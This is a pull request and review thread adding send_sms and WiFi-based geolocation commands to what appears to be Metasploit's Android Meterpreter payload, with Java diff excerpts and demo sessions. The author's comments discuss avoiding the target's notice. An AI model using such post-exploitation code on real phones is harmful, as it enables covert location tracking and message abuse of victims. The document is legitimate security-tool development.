### PR TITLE
send_sms + wlan_geolocate

### PR DESCRIPTION
**Pull request by Jack64**
Added WiFi-based geolocation for android.
Added send_sms extension for android.
(Framework @ https://github.com/rapid7/metasploit-framework/pull/5748)

DEMO:
```
Android Commands
================

    Command         Description
    -------         -----------
    check_root      Check if device is rooted
    dump_calllog    Get call log
    dump_contacts   Get contacts list
    dump_sms        Get sms messages
    geolocate       Get current lat-long using geolocation
    send_sms        Sends SMS from target session
    wlan_geolocate  Get current lat-long using WLAN information

meterpreter > wlan_geolocate 
[*] Google indicates that the target is within 150 meters of XX.XXXXXX,-X.XXXXXXX.
[*] Google Maps URL:  https://maps.google.com/?q=XX.XXXXXX,-X.XXXXXX
meterpreter > send_sms 
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."

OPTIONS:

    -d <opt>  Destination number
    -dr        Wait for delivery report
    -h        Help Banner
    -t <opt>  SMS body text


meterpreter > send_sms -dr -d XXXXXXXXX -t "Hello World"
[+] SMS sent - Transmission successful
[+] SMS delivered - Transmission successful
```

### CODE REVIEW

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java [hunk 1]
```diff
@@ -0,0 +1,112 @@
+ package com.metasploit.meterpreter;
```
Comment (timwr) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java]: package com.metasploit.meterpreter.android;?

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java [hunk 2]
```diff
@@ -0,0 +1,112 @@
...
+
+	 wifiList=null;
+	 synchronized (scanready){
+		int n=0;
+		while(wifiList == null) {
+//			Log.i("AAA","Waiting for scan results..");
+
+			//Unsure what happens if there are is no WiFi around,
+			//so this returns an error after 30sec without scan results
+			if (n>30){
```
Comment (timwr) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java]: You can remove the while loop and just do wait(30000);

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java [hunk 3]
```diff
@@ -0,0 +1,109 @@
...
+
+
+    @Override
+    public int execute(Meterpreter meterpreter, TLVPacket request,
+                       TLVPacket response) throws Exception {
+
+	String number = request.getStringValue(TLV_TYPE_SMS_ADDRESS);
+	String message = request.getStringValue(TLV_TYPE_SMS_BODY);
+	SmsManager sm = SmsManager.getDefault();
+	if (message.length() > 160) {
```
Comment (timwr) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java]: You could consider moving this check back into the framework repository

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java [hunk 4]
```diff
@@ -0,0 +1,109 @@
...
+						result = "No service";
+						break;
+				}
+			}
+		}, new IntentFilter(SMS_DELIVERED));
+
+		// Get the default instance of SmsManager
+		SmsManager smsManager = SmsManager.getDefault();
+		// Send a text based SMS
+		smsManager.sendTextMessage(number, null, message, sentPendingIntent, deliveredPendingIntent);
```
Comment (timwr) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java]: Looks like you're not actually using the result. You could consider blocking the thread until you receive a result (like the wlan_geolocate module).

**Comment by timwr** [comment]
Great stuff @Jack64 :)

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java (hunk 2 above)
Comment (Jack64) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java]: Yea, I started it out that way, but if WiFi is enabled on the target device it's usually less than 30sec to trigger SCAN_RESULTS_AVAILABLE_ACTION . If WiFi is off and the wait time is 30sec and SCAN_RESULTS_AVAILABLE_ACTION returns at 20sec, that's 10sec WiFi will stay on unnecessarily and might even trigger an unintended network switch that will get the target's attention. Hence the check every second and 30 loop max.

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java (hunk 3 above)
Comment (Jack64) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java]: What I should consider is actually implementing the procedure for >160 chars, duh. my bad, sorry, I'll push a fix for this.

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java (hunk 4 above)
Comment (Jack64) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java]: Right again, will fix this in next push .

**Comment by Jack64** [comment]
Thanks for the kind words and even more thanks for your improvement suggestions @timwr , I'll be pushing some fixes soon !

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java (hunk 1 above)
Comment (Jack64) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java]: damn it. no errors on compile or run though. will fix on next push.

File: java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java (hunk 2 above)
Comment (timwr) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java]: My point was the notify will interrupt the wait() so there is no need to loop

Comment (Jack64) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java]: But the notify is only called *IF* SCAN_RESULTS_AVAILABLE_ACTION is triggered, which I'm assuming it won't be if you're somewhere where there's no WiFi APs.

```
SCAN_RESULTS_AVAILABLE_ACTION Docs:
An access point scan has completed, and results are available from the supplicant. Call getScanResults() to obtain the results.
```
This doesn't say what happens if there are no WiFi access points around, so I don't know if it triggers or not. It does say the "scan has completed AND results are available from the supplicant", I don't know if that means it only triggers on both conditions. In any case I coded around it, I'll change it if there's confirmation it won't get stuck on an infinite loop (e.g. SCAN_RESULTS_AVAILABLE_ACTION always triggers) .

Comment (timwr) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java]: Why do you need the loop? The call to wait(30000) will timeout after 30 seconds anyway.

Comment (Jack64) [inline java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java]: So you suggest I remove the loop and simply `wait(30000)` ?

**Comment by bcook-r7** [comment]
Works OK on this Android M device:
```
meterpreter > sysinfo
Computer    : localhost
OS          : Android M - Linux 3.10.40-g32351f7 (armv7l)
Meterpreter : java/android
meterpreter > send_sms -d 8675309 -t Jenny?
[+] SMS sent - Transmission successful
meterpreter > geolocate
[*] Current Location:
	Latitude:  73.634515
	Longitude: -67.262333

To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=73.634515,-67.262333&sensor=true
```

Failed pretty soundly on my 4.2 device, but it also does not have a SIM :). I'll try again soon for informational purposes.

**Comment by Jack64** [comment]
@bcook-r7 make sure the command you run for WiFi geolocation is `wlan_geolocate` and not `geolocate` .

**Comment by bcook-r7** [comment]
jenkins, this is ok to test

**Comment by bcook-r7** [comment]
I made some whitespace-only tweaks but left this largely as-is. Note Java here is indented with spaces, not hard tabs :)

**Pull request merged**